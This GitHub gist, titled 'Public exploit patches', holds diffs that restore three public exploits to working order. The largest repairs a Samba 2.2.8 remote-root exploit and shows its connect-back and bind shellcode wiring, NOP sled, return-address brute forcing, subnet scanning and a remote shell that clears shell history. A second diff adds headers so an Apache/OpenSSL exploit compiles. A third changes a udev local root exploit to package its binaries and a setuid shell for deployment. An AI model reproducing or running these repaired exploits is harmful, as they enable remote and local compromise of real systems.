- sambal.c patch for http://www.exploit-db.com/exploits/10/ - broken C code by newlines
- ssl2.h patch for http://www.phreedom.org/research/exploits/apache-openssl/ - missing headers which keeps it from compiling on newer Linux versions
- udev.sh patch for http://www.exploit-db.com/exploits/8478/ - builds an archive with binaries instead of building an executing the exploit
Last active
December 24, 2015 15:59
-
-
Save SaltwaterC/6824871 to your computer and use it in GitHub Desktop.
Public exploit patches
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- sambal.c 2013-10-04 14:56:16.569020705 +0300 | |
| +++ sambal-fixed.c 2013-10-04 14:56:19.573020573 +0300 | |
| @@ -217,14 +217,11 @@ | |
| usage(char *prog) | |
| { | |
| fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" | |
| - "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/Net | |
| -BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" | |
| + "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" | |
| "-B <step> bruteforce steps (default = 300)\n" | |
| "-c <ip address> connectback ip address\n" | |
| - "-C <max childs> max childs for scan/bruteforce mode (d | |
| -efault = 40)\n" | |
| - "-d <delay> bruteforce/scanmode delay in micro sec | |
| -onds (default = 100000)\n" | |
| + "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n" | |
| + "-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)\n" | |
| "-f force\n" | |
| "-p <port> port to attack (default = 139)\n" | |
| "-r <ret> return address\n" | |
| @@ -290,10 +287,8 @@ | |
| ptr -= 19; | |
| - if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & | |
| -& *(ptr + 3) == 0x00 && | |
| - *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 & | |
| -& *(ptr + 6) == 0x00) { | |
| + if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 && | |
| + *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) { | |
| close(s); | |
| return 0; | |
| } | |
| @@ -360,8 +355,7 @@ | |
| } | |
| - select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti | |
| -meout); | |
| + select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); | |
| if(select_status == 0) { | |
| close(fd); | |
| @@ -375,12 +369,10 @@ | |
| } | |
| if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { | |
| - if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) | |
| - { | |
| + if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { | |
| getsockopt_length = sizeof(getsockopt_error); | |
| - if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err | |
| -or, &getsockopt_length) < 0) { | |
| + if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { | |
| errno = ETIMEDOUT; | |
| close(fd); | |
| return -1; | |
| @@ -524,8 +516,7 @@ | |
| shell(int sock) | |
| { | |
| fd_set fd_read; | |
| - char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE | |
| -\";uname -a;id;\n"; | |
| + char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n"; | |
| int n; | |
| FD_ZERO(&fd_read); | |
| @@ -584,8 +575,7 @@ | |
| if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { | |
| fprintf(stdout, "+ Worked!\n" | |
| - "---------------------------------------------- | |
| -----------------\n"); | |
| + "--------------------------------------------------------------\n"); | |
| shell(sock); | |
| close(sock); | |
| } | |
| @@ -598,12 +588,9 @@ | |
| { | |
| char buffer[1000]; | |
| char response[4096]; | |
| - char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 | |
| -\x00\x00\x00"; | |
| - char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 | |
| -\x6e\x6f\x62\x6f\x64\x79" | |
| - "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24 | |
| -"; | |
| + char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; | |
| + char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" | |
| + "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; | |
| NETBIOS_HEADER *netbiosheader; | |
| SMB_HEADER *smbheader; | |
| @@ -628,8 +615,7 @@ | |
| smbheader->uid = 100; | |
| smbheader->mid = 0x01; | |
| - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da | |
| -ta1, sizeof(session_data1) - 1); | |
| + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); | |
| if(write_timer(sock, 3) == 1) | |
| if (send(sock, buffer, 50, 0) < 0) return -1; | |
| @@ -642,8 +628,7 @@ | |
| netbiosheader = (NETBIOS_HEADER *)response; | |
| smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); | |
| - if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess | |
| -ion message\n"); | |
| + if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); | |
| netbiosheader = (NETBIOS_HEADER *)buffer; | |
| smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); | |
| @@ -663,8 +648,7 @@ | |
| smbheader->tid = 0x00; | |
| smbheader->uid = 100; | |
| - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da | |
| -ta2, sizeof(session_data2) - 1); | |
| + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); | |
| if(write_timer(sock, 3) == 1) | |
| if (send(sock, buffer, 64, 0) < 0) return -1; | |
| @@ -688,12 +672,9 @@ | |
| char buffer[4000]; | |
| char exploit_data[] = | |
| - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x | |
| -00\x00\x00" | |
| - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x | |
| -00\x00\x00\x00" | |
| - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x | |
| -00\x00\x00\x00" | |
| + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| "\x00\x00\x00\x90"; | |
| int i = 0; | |
| @@ -719,8 +700,7 @@ | |
| smbheader->tid = 0x01; | |
| smbheader->uid = 100; | |
| - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex | |
| -ploit_data), 0x90, 3000); | |
| + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); | |
| buffer[1096] = 0xEB; | |
| buffer[1097] = 0x70; | |
| @@ -748,12 +728,9 @@ | |
| char buffer[4000]; | |
| char exploit_data[] = | |
| - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x | |
| -00\x00\x00" | |
| - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x | |
| -00\x00\x00\x00" | |
| - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x | |
| -00\x00\x00\x00" | |
| + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
| "\x00\x00\x00\x90"; | |
| int i = 0; | |
| @@ -778,8 +755,7 @@ | |
| smbheader->tid = 0x01; | |
| smbheader->uid = 100; | |
| - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex | |
| -ploit_data), 0x90, 3000); | |
| + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); | |
| for (i = 0; i < 4 * 24; i += 4) | |
| memcpy(buffer + 1131 + i, &dummy, 4); | |
| @@ -789,8 +765,7 @@ | |
| memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), | |
| exploit_data, sizeof(exploit_data) - 1); | |
| - memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) | |
| -; | |
| + memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); | |
| if(write_timer(sock, 3) == 1) { | |
| if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; | |
| @@ -832,10 +807,8 @@ | |
| struct hostent *he; | |
| - fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric | |
| -.org|be)\n" | |
| - "------------------------------------------------------ | |
| ---------\n"); | |
| + fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n" | |
| + "--------------------------------------------------------------\n"); | |
| while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { | |
| switch(opt) | |
| @@ -843,8 +816,7 @@ | |
| case 'b': | |
| brute = atoi(optarg); | |
| if ((brute < 0) || (brute > 3)) { | |
| - fprintf(stderr, "Invalid platform.\n\n" | |
| -); | |
| + fprintf(stderr, "Invalid platform.\n\n"); | |
| return -1; | |
| } | |
| break; | |
| @@ -853,38 +825,29 @@ | |
| if (STEPS == 0) STEPS++; | |
| break; | |
| case 'c': | |
| - sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, | |
| - &ip4); | |
| + sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); | |
| connectback = 1; | |
| - if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == | |
| -0) { | |
| - fprintf(stderr, "Invalid IP address.\n\ | |
| -n"); | |
| + if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { | |
| + fprintf(stderr, "Invalid IP address.\n\n"); | |
| return -1; | |
| } | |
| - linux_connect_back[33] = ip1; bsd_connect_back[ | |
| -24] = ip1; | |
| - linux_connect_back[34] = ip2; bsd_connect_back[ | |
| -25] = ip2; | |
| - linux_connect_back[35] = ip3; bsd_connect_back[ | |
| -26] = ip3; | |
| - linux_connect_back[36] = ip4; bsd_connect_back[ | |
| -27] = ip4; | |
| + linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1; | |
| + linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2; | |
| + linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3; | |
| + linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4; | |
| break; | |
| case 'C': | |
| MAX_CHILDS = atoi(optarg); | |
| if (MAX_CHILDS == 0) { | |
| - fprintf(stderr, "Invalid number of chil | |
| -ds.\n"); | |
| + fprintf(stderr, "Invalid number of childs.\n"); | |
| return -1; | |
| } | |
| if (MAX_CHILDS > 99) { | |
| - fprintf(stderr, "Too many childs, using | |
| - 99. \n"); | |
| + fprintf(stderr, "Too many childs, using 99. \n"); | |
| MAX_CHILDS = 99; | |
| } | |
| @@ -918,13 +881,10 @@ | |
| case 't': | |
| type = atoi(optarg); | |
| if (type == 0 || type > sizeof(targets) / 16) { | |
| - for(i = 0; i < sizeof(targets) / 16; i+ | |
| -+) | |
| - fprintf(stdout, "%02d. %s | |
| - [0x%08x]\n", i + 1, | |
| + for(i = 0; i < sizeof(targets) / 16; i++) | |
| + fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, | |
| - targets[i].type | |
| -, (unsigned int) targets[i].ret); | |
| + targets[i].type, (unsigned int) targets[i].ret); | |
| fprintf(stderr, "\n"); | |
| return -1; | |
| } | |
| @@ -939,8 +899,7 @@ | |
| } | |
| - if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && | |
| - scan == 0)) | |
| + if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) | |
| usage(argv[0] == NULL ? "sambal" : argv[0]); | |
| if (scan == 1) | |
| @@ -967,20 +926,17 @@ | |
| for (ip4 = 0; ip4 < 255; ip4++) { | |
| i++; | |
| - snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% | |
| -u.%u", ip1, ip2, ip3, ip4); | |
| + snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4); | |
| usleep(BRUTE_DELAY); | |
| switch (fork()) { | |
| case 0: | |
| switch(is_samba(scan_ip, 2)) { | |
| case 0: | |
| - fprintf(stdout, | |
| - "+ [%s] Samba\n", scan_ip); | |
| + fprintf(stdout, "+ [%s] Samba\n", scan_ip); | |
| break; | |
| case 1: | |
| - fprintf(stdout, | |
| - "+ [%s] Windows\n", scan_ip); | |
| + fprintf(stdout, "+ [%s] Windows\n", scan_ip); | |
| break; | |
| default: | |
| break; | |
| @@ -989,8 +945,7 @@ | |
| exit(0); | |
| break; | |
| case -1: | |
| - fprintf(stderr, "+ fork() error | |
| -\n"); | |
| + fprintf(stderr, "+ fork() error\n"); | |
| exit(-1); | |
| break; | |
| default: | |
| @@ -1022,8 +977,7 @@ | |
| shellcode = targets[type - 1].shellcode; | |
| if (connectback == 1) { | |
| - fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 | |
| -95]\n", | |
| + fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", | |
| ip1, ip2, ip3, ip4); | |
| switch(targets[type - 1].os_type) { | |
| @@ -1061,31 +1015,26 @@ | |
| addr2.sin_family = AF_INET; | |
| addr2.sin_port = htons(45295); | |
| - if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == | |
| --1) { | |
| + if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { | |
| fprintf(stderr, "+ connect() error.\n"); | |
| return -1; | |
| } | |
| - if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t | |
| -ype); | |
| + if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type); | |
| if (force == 0) { | |
| if (is_samba(argv[optind], 2) != 0) { | |
| - fprintf(stderr, "+ Host is not running samba!\n | |
| -\n"); | |
| + fprintf(stderr, "+ Host is not running samba!\n\n"); | |
| return -1; | |
| } | |
| fprintf(stderr, "+ Host is running samba.\n"); | |
| } | |
| - if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( | |
| -char *)inet_ntoa(addr1.sin_addr), port); | |
| + if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); | |
| - if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. | |
| -\n"); | |
| + if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n"); | |
| if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); | |
| sleep(5); | |
| @@ -1104,16 +1053,13 @@ | |
| sleep(2); | |
| if (connectback == 0) { | |
| - if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add | |
| -r2)) == -1) { | |
| - fprintf(stderr, "+ Exploit failed, try -b to br | |
| -uteforce.\n"); | |
| + if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { | |
| + fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n"); | |
| return -1; | |
| } | |
| - fprintf(stdout, "-------------------------------------- | |
| -------------------------\n"); | |
| + fprintf(stdout, "--------------------------------------------------------------\n"); | |
| shell(sock2); | |
| close(sock); | |
| @@ -1138,20 +1084,17 @@ | |
| case 1: | |
| if (ret == 0) ret = 0xbfc00000; | |
| shellcode = bsd_bindcode; | |
| - fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ | |
| -n"); | |
| + fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n"); | |
| break; | |
| case 2: | |
| if (ret == 0) ret = 0xdfc00000; | |
| shellcode = bsd_bindcode; | |
| - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr | |
| -ior)\n"); | |
| + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n"); | |
| break; | |
| case 3: | |
| if (ret == 0) ret = 0x00170000; | |
| shellcode = bsd_bindcode; | |
| - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- | |
| -exec stack)\n"); | |
| + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n"); | |
| break; | |
| } | |
| @@ -1182,8 +1125,7 @@ | |
| if (sock2 > 2) close(sock2); | |
| if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { | |
| - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" | |
| -); | |
| + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); | |
| } | |
| else { | |
| ret -= STEPS; | |
| @@ -1191,21 +1133,18 @@ | |
| } | |
| if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) | |
| - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" | |
| -); | |
| + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); | |
| if ((ret & 0xff) == 0x00 && brute != 3) ret++; | |
| - if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u | |
| -nsigned int)ret); | |
| + if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret); | |
| usleep(BRUTE_DELAY); | |
| switch (childs[i] = fork()) { | |
| case 0: | |
| - if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad | |
| -dr), port, 2) == -1) { | |
| + if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) { | |
| if (sock > 2) close(sock); | |
| if (sock2 > 2) close(sock2); | |
| exit(-1); | |
| @@ -1213,30 +1152,23 @@ | |
| if(write_timer(sock, 3) == 1) { | |
| if (start_session(sock) < 0) { | |
| - if (verbose == 1) fprintf(stder | |
| -r, "+ Session failed.\n"); | |
| + if (verbose == 1) fprintf(stderr, "+ Session failed.\n"); | |
| if (sock > 2)close(sock); | |
| if (sock2 > 2) close(sock2); | |
| exit(-1); | |
| } | |
| if (brute == 3) { | |
| - if (exploit_openbsd32(sock, ret | |
| -, shellcode) < 0) { | |
| - if (verbose == 1) fprin | |
| -tf(stderr, "+ Failed.\n"); | |
| - if (sock > 2) close(so | |
| -ck); | |
| - if (sock2 > 2) close(so | |
| -ck2); | |
| + if (exploit_openbsd32(sock, ret, shellcode) < 0) { | |
| + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); | |
| + if (sock > 2) close(sock); | |
| + if (sock2 > 2) close(sock2); | |
| exit(-1); | |
| } | |
| } | |
| else { | |
| - if (exploit_normal(sock, ret, shellcode | |
| -) < 0) { | |
| - if (verbose == 1) fprintf(stder | |
| -r, "+ Failed.\n"); | |
| + if (exploit_normal(sock, ret, shellcode) < 0) { | |
| + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); | |
| if (sock > 2) close(sock); | |
| if (sock2 > 2) close(sock2); | |
| exit(-1); | |
| @@ -1244,14 +1176,12 @@ | |
| if (sock > 2) close(sock); | |
| - if ((sock2 = socket(AF_INET, SOCK_STREA | |
| -M, 6)) < 0) { | |
| + if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { | |
| if (sock2 > 2) close(sock2); | |
| exit(-1); | |
| } | |
| - if(Connect(sock2, (char *)inet_ntoa(add | |
| -r1.sin_addr), 45295, 2) != -1) { | |
| + if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { | |
| if (sock2 > 2) close(sock2); | |
| kill(getppid(), SIGUSR1); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- ssl2.h 2002-09-13 03:41:06.000000000 +0300 | |
| +++ ssl2-fixed.h 2013-10-07 11:18:39.731298505 +0300 | |
| @@ -1,6 +1,10 @@ | |
| #include <openssl/ssl.h> | |
| #include <openssl/x509.h> | |
| +// patch | |
| +#include <openssl/md5.h> | |
| +#include <openssl/rc4.h> | |
| + | |
| /* read/write buffer */ | |
| #define BUFSIZE 16384 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- udev.sh 2013-10-07 17:53:10.441939685 +0300 | |
| +++ udev-pack.sh 2013-10-07 17:51:35.225935207 +0300 | |
| @@ -103,7 +103,7 @@ | |
| } | |
| _EOF | |
| -gcc udev.c -o /tmp/udev | |
| +gcc udev.c -o udev | |
| cat > program.c << _EOF | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| @@ -126,8 +126,19 @@ | |
| setgid(0); setuid(0); | |
| execl("/bin/sh","sh",0); } | |
| _EOF | |
| -gcc -o /tmp/suid suid.c | |
| -cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 | |
| -/tmp/udev $1 | |
| +gcc -o suid suid.c | |
| + | |
| +mkdir udev-pack | |
| +cd udev-pack | |
| +mv ../udev . | |
| +mv ../suid . | |
| +mv ../libno_ex.so.1.0 . | |
| +cd - | |
| +rm -f udev-pack.tar udev-pack.tar.gz | |
| +tar -cvf udev-pack.tar udev-pack | |
| +gzip -9 udev-pack.tar | |
| + | |
| +rm -rf udev-pack udev suid libno_ex.so.1.0 | |
| +rm -rf udev.c program.c suid.c | |
| # milw0rm.com [2009-04-20] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment